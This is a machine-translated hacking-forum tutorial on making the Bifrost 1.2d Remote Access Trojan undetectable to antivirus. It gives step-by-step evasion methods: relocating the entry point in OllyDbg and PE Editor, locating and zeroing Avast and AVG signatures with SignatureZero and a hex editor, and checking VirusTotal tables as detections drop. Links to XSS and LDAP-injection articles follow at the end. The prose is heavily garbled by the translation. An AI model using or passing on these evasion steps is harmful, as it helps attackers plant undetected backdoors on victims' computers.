1. Objective

Trying to make the Bifrost Server 1.2d which is the latest version of a remote control KSV undetectable to Antivirus

Software Required —– description ———————————————————————— Download
Bifrost 1.2dR.AT ———– (Remote Access Trojan) More commonly known as Troajn ——————–

2. Why this version?

  • This is the RAT (Remote Access Trojan) the more stable who have been created for all Windows bones together.
  • IT is FWB, that is to say that it’s the server that connects to the customer, it creates a connection has
  • Through a network.
  • He got the Bypass firewalls particularity and routers.
  • It has an integrated Ring0 a rootkit.

Strang you tell me !, how a malware can bypass firewall and router without the Nat network on which the PC is infected or not configured ?
Well, it was the injection of code in a process of law dialogue with the web.
The injection is a method that going as its name suggests inject code into a space has an application that has rights to level the score firewell kind web messenger or your favorite example and use his connection to interact with the Customer.

The injection does not bypass the heuristic antivirus defenses.

3. Stages of indetectability

First Possibility

Start with the characteristics our auprés VA server for that I will use as a test for virustotal.com my scan is a scan online antivirus thirty.
The Server that I will create and test virustoal soon detected by antivirus (next day as AVG) because Virustotal.com transmit files doubtful antivirus companies.

Second Possibility

Alternatives exist as software Mini AV’s SCAN edited by Activespy.org.

Download

Pass: activespy.org

ScreenShot

Tutorial

Code:
http://rapidshare.de/files/39357402/Mini_AV_Scanner_Tutorial.rar"]http://rapidshare.de/files/39357402/Mini_A...er_Tutorial.rar

]

Addition antivirus

Antivirus ————– Version ——- Download
Kaspersky ————- 8.0 ————— [code]http://dnl-eu9.kaspersky-labs.com/trial/registered/T8NUGHY6XWLOJ7VEMFIB/kav8.0.0.357fr.exe”]here[/url]
Professional Avast — 4.8 —————

Code:
http://download674.avast.com/iavs4pro/setupfrepro.exe

AVG. ——————– 8.0 ————–

Code:
http://download.avg.com/filedir/inst/avg_avwt_stf_g7_8_156a1345.exe

NOD32 —————– 3.0 ————–

Code:
http://www.eset-nod32.fr/telecharger_evaluations.html

Norman ————————————

Code:
http://www.norman.com/Download/Trial_versions/fr/fr

This is the first scan of our original server on VirusTotal.

  • Antivirus ——————- Version ————– Update ————– Result
  • Ahnlab-V3 —————— 2008.8.5.0 ———- 2008.08.05 ——— Win-Trojan/Midgare.32256
  • AntiVir ———————– 7.8.1.15 ————- 2008.08.05 ——— TR/Spy.Banker.AAUT.14
  • Authentium —————– 5.1.0.4 ————– 2008.08.05 ——— W32/Backdoor2.CBJB
  • Avast ———————— 4.8.1195.0 ———- 2008.08.05 ——— Win32: Crypt-CIK
  • AVG ————————– 8.0.0.156 ———– 2008.08.05 ——— BackDoor.Generic9.ASJE
  • BitDefender —————- 7.2 ——————- 2008.08.05 ——— Trojan.Spy.Banker.AAUT
  • CAT-QuickHeal ————- 9.50 —————– 2008.08.04 ——— Trojan.Midgare.fvp
  • ClamAV ——————— 0.93.1 ————— 2008.08.05 ——— Trojan.Bifrose-3265
  • DrWeb ———————- 4.44.0.09170 —— 2008.08.05 ——— Trojan.Inject.3631
  • eSafe ———————– 7.0.17.0 ————- 2008.08.05 ——— Win32.Midgare.fcz
  • eTrust-Vet —————– 31.6.6009 ———– 2008.08.05 ——— Win32/VMalum.DCPV
  • Ewido ———————– 4.0 ——————- 2008.08.05 ——— Trojan.Midgare.fcz
  • F-Prot ———————– 4.4.4.56 ———— 2008.08.04 ——— W32/Backdoor2.CBJB
  • F-Secure ——————- 7.60.13501.0 —— 2008.08.05 ——— Trojan.Win32.Midgare.fcz
  • Fortinet ——————— 3.14.0.0 ———— 2008.08.05 ——— BDoor.CEP! tr.bdr
  • Gdata ———————– 2.0.7306.1023 —– 2008.08.05 ——– Trojan.Win32.Midgare.fcz
  • Ikarus ———————- T3.1.1.34.0 ——— 2008.08.05 ——– Trojan.Win32.Midgare.eni
  • K7AntiVirus —————- 7.10.404 ———— 2008.08.05 ——– Trojan.Win32.Midgare.fcz
  • Kaspersky —————– 7.0.0.125 ———– 2008.08.05 ——– Trojan.Win32.Midgare.fcz
  • McAfee ——————— 5353 —————- 2008.08.04 ——— BackDoor-CEP.gen.a
  • Microsoft ——————- 1.3807 ————– 2008.08.05 ——– Trojan: Win32/Midgare.A
  • NOD32v2 —————— 3328 —————– 2008.08.05 ——– probably a variant of Win32/Agent
  • Norman ——————– 5.80.02 ————– 2008.08.05 ——– W32/Smalldoor.BMLD
  • Panda ———————- 9.0.0.4 ————– 2008.08.04 ——– Not detected
  • PCTools ——————- 4.4.2.0 ————— 2008.08.05 ——– Not detected
  • Prevx1 ——————— V2 ——————– 2008.08.05 ——– System Back Door
  • Rising ———————- 20.56.12.00 ——– 2008.08.05 ——– Not detected
  • Sophos ——————– 4.31.0 ————— 2008.08.05 ——– Mal / Generic-A
  • Sunbelt ——————– 3.1.1537.1 ———- 2008.08.01 ——– Trojan.Win32.Midgare.fcz
  • Symantec —————– 10 ——————— 2008.08.05 ——– Backdoor.Trojan
  • TheHacker —————- 6.2.96.393 ———- 2008.08.04 ——– Trojan / Midgare.eni
  • TrendMicro —————- 8.700.0.1004 ——- 2008.08.05 ——– BKDR_AHZE.A
  • VBA32 ——————— 3.12.8.2 ————- 2008.08.05 ——– Trojan.Win32.Midgare.hhn
  • ViRobot ——————–2008.8.5.1324 —— 2008.08.05 ——– Trojan.Win32.Midgare.32256
  • VirusBuster ————— 4.5.11.0 ————- 2008.08.04 ——– Backdoor.Bifrose.GUF
  • Webwasher-Gateway — 6.6.2 —————– 2008.08.05 ——– Trojan.Spy.Banker.AAUT.14

At this point, with the original Server, we can already see that some antivirus are already out of date, yet to Stub is already on the net for several weeks, but what do the Multinational Security alias as Panda Panda software ?
The Stub and the body of the server on which we are transplanting given as the client IP address or no-ip address for its IP router, the installation method, etc. .. short, all the information you enter in the builder when you create your server.

  • The size of Stub original Bifrost 1.2d is 32 256 bytes.

4. The various stages

  1. Changing the point of entry
  2. Detection and modification of a viral signature


5. Changing the point of entry

The principle of this method is to move the point of entry into an empty area code.

Software Required —– Description —————————————————————————————- Download
Ollydbg 2.0 —————– Ollydbg 2.0 Allows you to disassemble an application and its code mofiier ASM. ———–

Code:
http://www.ollydbg.de/odbg200g.zip

PE Editor 1.7—————- Editeur resource EP, it helps to put the entry point change. ———————————-

Code:
http://download.softpedia.ro/dl/454590ac0f18a57fb2a6830285bba264/48987a72/100000028/software/UTILE/PEditor1.7.zip

The principle of this method is to move the point of entry into an empty area code.

Run Ollydbg and analyze our server.
When you open your server, it asks if you unpack, you do so.

We are right in the interface with the server Ollydbg disassembled:

  • The entry point is on the line 00407C89 it is dimmed.
    We will highlight the lines that we interressent.

  • Then right click above> Binary> Binary copyNow seek a place free or I can recall my point of entry.
    Further down the server, you will find the place empty, it represents this way:

  • Include now our point of entry into the free zone.
    Highlight at least thirty blank lines and right click> Binary> Binary paste.

    You get this:

  • We will add several instructions as a result.
    It is important to uncheck the “Fill with NOP’s” for future operations!
    Double click on the column of the direction of the line 00407EF3 for me.

  • Enter PUSH 1 and click Assembe, you get this:

  • Scroll now has 00407F06 line and get his instructions as a result of:

Sub a change ——– Instruction to add ———- Explanation
00407F06————– JMP 00407C9E ——————- Renvoie the line 00407C9E
00407F07 ————- PUSH 2 —————————- Repositionne in the pile
00407F08 ————- PUSH 2 —————————- Repositionne in the pile
00407F09 ————- NOP ——————————- Doing nothing
00407F09 ————- NOP ——————————- Doing nothing

  • The JMP wrapping 00407C9E as if that is below the debut of the stack.

  • You need to get this final:

Now change to our server

  • To return to the point of entry, right click> Go to> OriginThis brings us back to our point of entry moose, in the same way, we will modify the instructions.
    To do this, we will add 12 NOP already has subsequently commançant by the line of point of entry which is 0,040,789.

    You must get this:

  • Back to the first line is 00407C89 Mofidi and instruction by NOP MOV EAX, 321 and then finish by a series of PUSH EBP.You must get this:

  • To save the modified:
    Right click> Cooy to execute> Copy All Amendments and all.

    To save your server Mofid:
    Right click> Save File

    Voila, with our change Ollydbg asm is Completed, it is essential to close ollydbg for further operations
    We will now rename the entry point with PE Editor 1.7.

    Launch your server and load it.

  • The entry point of origin at the top left 00007C89, it is here that we put our new point of entry.
    In asm as we had with our new entry point 00407EF3

    For our new entry point in PE Editor, we need to change 4 to 0 that becomes 00007EF3
    Go to new entry point at the place of another and then click Apply Change

  • The first amendment to the server is finished and it works very well

  • Let us now take it that data from virus total
  • Antivirus ——————- Version ————– Update ————– Result
  • Ahnlab-V3 —————— 2008.8.5.0 ———- 2008.08.05 ——— Not detected
  • AntiVir ———————– 7.8.1.15 ————- 2008.08.05 ——— TR/Spy.Banker.AAUT.14
  • Authentium —————– 5.1.0.4 ————– 2008.08.05 ——— Not detected
  • Avast ———————— 4.8.1195.0 ———- 2008.08.05 ——— Win32: Crypt-CIK
  • AVG ————————– 8.0.0.156 ———– 2008.08.05 ——— BackDoor.Generic9.ASJE
  • BitDefender —————- 7.2 ——————- 2008.08.05 ——— Trojan.Spy.Banker.AAUT
  • CAT-QuickHeal ————- 9.50 —————– 2008.08.04 ——— Not detected
  • ClamAV ——————— 0.93.1 ————— 2008.08.05 ——— Not detected
  • DrWeb ———————- 4.44.0.09170 —— 2008.08.05 ——— Trojan.Inject.3631
  • eSafe ———————– 7.0.17.0 ————- 2008.08.05 ——— Win32.Midgare.fcz
  • eTrust-Vet —————– 31.6.6009 ———– 2008.08.05 ——— Not detected
  • Ewido ———————– 4.0 ——————- 2008.08.05 ——— Not detected
  • F-Prot ———————– 4.4.4.56 ———— 2008.08.04 ——— Not detected
  • F-Secure ——————- 7.60.13501.0 —— 2008.08.05 ——— Trojan.Win32.Midgare.fcz
  • Fortinet ——————— 3.14.0.0 ———— 2008.08.05 ——— Not detected
  • Gdata ———————– 2.0.7306.1023 —– 2008.08.05 ——– Trojan.Win32.Midgare.fcz
  • Ikarus ———————- T3.1.1.34.0 ——— 2008.08.05 ——– Trojan.Win32.Midgare.eni
  • K7AntiVirus —————- 7.10.404 ———— 2008.08.05 ——– Not detected
  • Kaspersky —————– 7.0.0.125 ———– 2008.08.05 ——– Trojan.Win32.Midgare.fcz
  • McAfee ——————— 5353 —————- 2008.08.04 ——— BackDoor-CEP.gen.a
  • Microsoft ——————- 1.3807 ————– 2008.08.05 ——– Trojan: Win32/Midgare.A
  • NOD32v2 —————— 3328 —————– 2008.08.05 ——– Not detected
  • Norman ——————– 5.80.02 ————– 2008.08.05 ——– Not detected
  • Panda ———————- 9.0.0.4 ————– 2008.08.04 ——– Not detected
  • PCTools ——————- 4.4.2.0 ————— 2008.08.05 ——– Not detected
  • Prevx1 ——————— V2 ——————– 2008.08.05 ——– Not detected
  • Rising ———————- 20.56.12.00 ——– 2008.08.05 ——– Not detected
  • Sophos ——————– 4.31.0 ————— 2008.08.05 ——– Not detected
  • Sunbelt ——————– 3.1.1537.1 ———- 2008.08.01 ——– Not detected
  • Symantec —————– 10 ——————— 2008.08.05 ——– Not detected
  • TheHacker —————- 6.2.96.393 ———- 2008.08.04 ——– Not detected
  • TrendMicro —————- 8.700.0.1004 ——- 2008.08.05 ——– Not detected
  • VBA32 ——————— 3.12.8.2 ————- 2008.08.05 ——– Not detected
  • ViRobot ——————–2008.8.5.1324 —— 2008.08.05 ——– Not detected
  • VirusBuster ————— 4.5.11.0 ————- 2008.08.04 ——– Backdoor.Bifrose.GUF
  • Webwasher-Gateway — 6.6.2 —————– 2008.08.05 ——– Trojan.Spy.Banker.AAUT.14
  • More than half of the virus have already been defeated, but much still resists anyway, therefore continue our investigation into the undetectable.

6. Detection and modification of a viral signature

Software Required ——— Description —————————————————————————————– Download
Avast 4.8 Prof. —————- Antivirus. ———————————————————————————————-

Code:
http://download674.avast.com/iavs4pro/setupfrepro.exe

SignatureZero —————— Publisher Haxadecimal applying the method of Split. ——————————————-

Hex WorkShop 5.1.3 ———- Hex editor ——————————————————————————————–

Code:
http://www.bpsoft.com/downloads/hw32v513.exe

Most antivirus detect a Malvar thanks to a signature Hexadecimal, this signature varies from one virus to another.

  • Some glaring examples to start
    Edit your server with Hex Workshop and look at the top of the code, we can see a very distinct sentence means that the MOU was amended:

  • Make some small changes

  • With this change, you just Bypass Kaspersky who do détécterat more.
    And we continue to handle now that AVG also uses the detection signature.

Replace Rich for what you want

  • You’ve also Bypass AVG:]Check it all on our favorite site virustotal.com
  • Antivirus ——————- Version ————– Update ————– Result
  • Ahnlab-V3 —————— 2008.8.5.0 ———- 2008.08.05 ——— Not detected
  • AntiVir ———————– 7.8.1.15 ————- 2008.08.05 ——— TR/Spy.Banker.AAUT.14
  • Authentium —————– 5.1.0.4 ————– 2008.08.05 ——— Not detected
  • Avast ———————— 4.8.1195.0 ———- 2008.08.05 ——— Win32: Crypt-CIK
  • AVG ————————– 8.0.0.156 ———– 2008.08.05 ——— Not detected
  • BitDefender —————- 7.2 ——————- 2008.08.05 ——— Trojan.Spy.Banker.AAUT
  • CAT-QuickHeal ————- 9.50 —————– 2008.08.04 ——— Not detected
  • ClamAV ——————— 0.93.1 ————— 2008.08.05 ——— Not detected
  • DrWeb ———————- 4.44.0.09170 —— 2008.08.05 ——— Trojan.Inject.3631
  • eSafe ———————– 7.0.17.0 ————- 2008.08.05 ——— Win32.Midgare.fcz
  • eTrust-Vet —————– 31.6.6009 ———– 2008.08.05 ——— Not detected
  • Ewido ———————– 4.0 ——————- 2008.08.05 ——— Not detected
  • F-Prot ———————– 4.4.4.56 ———— 2008.08.04 ——— Not detected
  • F-Secure ——————- 7.60.13501.0 —— 2008.08.05 ——— Not detected
  • Fortinet ——————— 3.14.0.0 ———— 2008.08.05 ——— Not detected
  • Gdata ———————– 2.0.7306.1023 —– 2008.08.05 ——– Trojan.Win32.Midgare.fcz
  • Ikarus ———————- T3.1.1.34.0 ——— 2008.08.05 ——– Trojan.Win32.Midgare.eni
  • K7AntiVirus —————- 7.10.404 ———— 2008.08.05 ——– Not detected
  • Kaspersky —————– 7.0.0.125 ———– 2008.08.05 ——– Not detected
  • McAfee ——————— 5353 —————- 2008.08.04 ——— BackDoor-CEP.gen.a
  • Microsoft ——————- 1.3807 ————– 2008.08.05 ——– Trojan: Win32/Midgare.A
  • NOD32v2 —————— 3328 —————– 2008.08.05 ——– Not detected
  • Norman ——————– 5.80.02 ————– 2008.08.05 ——– Not detected
  • Panda ———————- 9.0.0.4 ————– 2008.08.04 ——– Not detected
  • PCTools ——————- 4.4.2.0 ————— 2008.08.05 ——– Not detected
  • Prevx1 ——————— V2 ——————– 2008.08.05 ——– Not detected
  • Rising ———————- 20.56.12.00 ——– 2008.08.05 ——– Not detected
  • Sophos ——————– 4.31.0 ————— 2008.08.05 ——– Not detected
  • Sunbelt ——————– 3.1.1537.1 ———- 2008.08.01 ——– Not detected
  • Symantec —————– 10 ——————— 2008.08.05 ——– Not detected
  • TheHacker —————- 6.2.96.393 ———- 2008.08.04 ——– Not detected
  • TrendMicro —————- 8.700.0.1004 ——- 2008.08.05 ——– Not detected
  • VBA32 ——————— 3.12.8.2 ————- 2008.08.05 ——– Not detected
  • ViRobot ——————–2008.8.5.1324 —— 2008.08.05 ——– Not detected
  • VirusBuster ————— 4.5.11.0 ————- 2008.08.04 ——– Backdoor.Bifrose.GUF
  • Webwasher-Gateway — 6.6.2 —————– 2008.08.05 ——– Trojan.Spy.Banker.AAUT.14

7. The explanation with Avast

  • The split method is to find the signature that detects Avast.
    Suppose that the code of our server and it is signed or Avast 6B8E B5A4

  • To find this signature, we already spend half the low offset and a zero test the exe with our antivirus Avast. If it Geulle, is that we have no signature deleted if it Geulle not, it is that the erased.

  • Save result in a PC that did not exclusion at Av.
    Avast thrashing and we’ll find the malware which is normal because the signature is always visible.
    Replace the original bytes and again putting the top bytes of zero and so on up so that you get the bytes that are criminalized 6B8E B5A4, the aim is to find rough up a signature.

    I find it a bit tedious to my taste and browse on the net, I find a small tool that fulfilled this function very well.

  • 1. Load server
    2. Putting a Zero offest
    3. Save the server completed
    4. Putting value before the offset
    5. Test duty with the Av
  • The rest have no value.C is the same principle that the method explained before, the sliders us to position ourselves in the code.
    You already set Avast with the exclusion SignatureZero.exe and your server.exe
    For setting SignatureZero, check Hexadecimal and select the directory that vat be used to test the server in my ca, the Bureau.

  • Move the sliders for that change is held at the display.
    I just load the server in SignatureZero with Abrir archivo and I click on probar for a test of detection.

  • you demarcate a zone with sliders, then click rellenar Con 0’s, the party between the cursor has become red means that any party that has offset zero, then click probar for testing.

Possibilities result

Undetected : The signing is in the offest put a zero located between the two sliders.
Detected :The signing is outside of being a zero offset between the two sliders.

  • For my test, the signature is in my zone in red, I click on deshacer Cambios to put the offset their original value.
    You can cliguer repeatedly rellenar con 0 ‘, the tool keeps a history of changes.

    You really rough as much as possible, ultimately, you find the offending piece of code.

  • To finish, use the up and down arrows to select offsets.

  • We have identified presisement signature and delete it, I save the result in cliquand on Guardar archivo, we will waive that “Server Bifrost UD Avast.exe” for example.
    Now compare our new server with the old and see that it is up in Hex Workshop :

  • SignatureZero just change the hexadecimal code of 00004F60 offset by putting them to zero, this solution works, it is to find a suitable equivalence if 00 does not replace.
    For our ca, it very well, we just Bypass Avast and after test, the server still works very well.

Greez to 5moke, v00d00chile , KPCR , Xylitol , Sh0ck , P3lo , t0fx ,Electricdr3ke, PHPlizardo, Oxygenique, Trap, Xash ,Nesuw, acla, bestpig and all body of europasecurity.org

Explore More

Critical XSS Vulnerability in http://shwephonecard.com registered parent company is “MMM Network L.L.C.”

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical XSS vulnerability on http://www.shwephonecard.com  registered parent company is “MMM Network L.L.C.” These are some information from Vulneral Site http://www.shwephonecard.com:

Read More

LDAP Injection Vulnerabilities

LDAP Injection Overview LDAP Injection attacks are not as common as the other types of injection attacks, but if your product uses an LDAP server this must be tested. An

Read More

Local File Download Theory

1 What's Local File Download(LFD)? - Local file download is kind of misconfigured web master or webdeveloper on php application. 2 Effect 2.1 Personal/website - You will able to view

Read More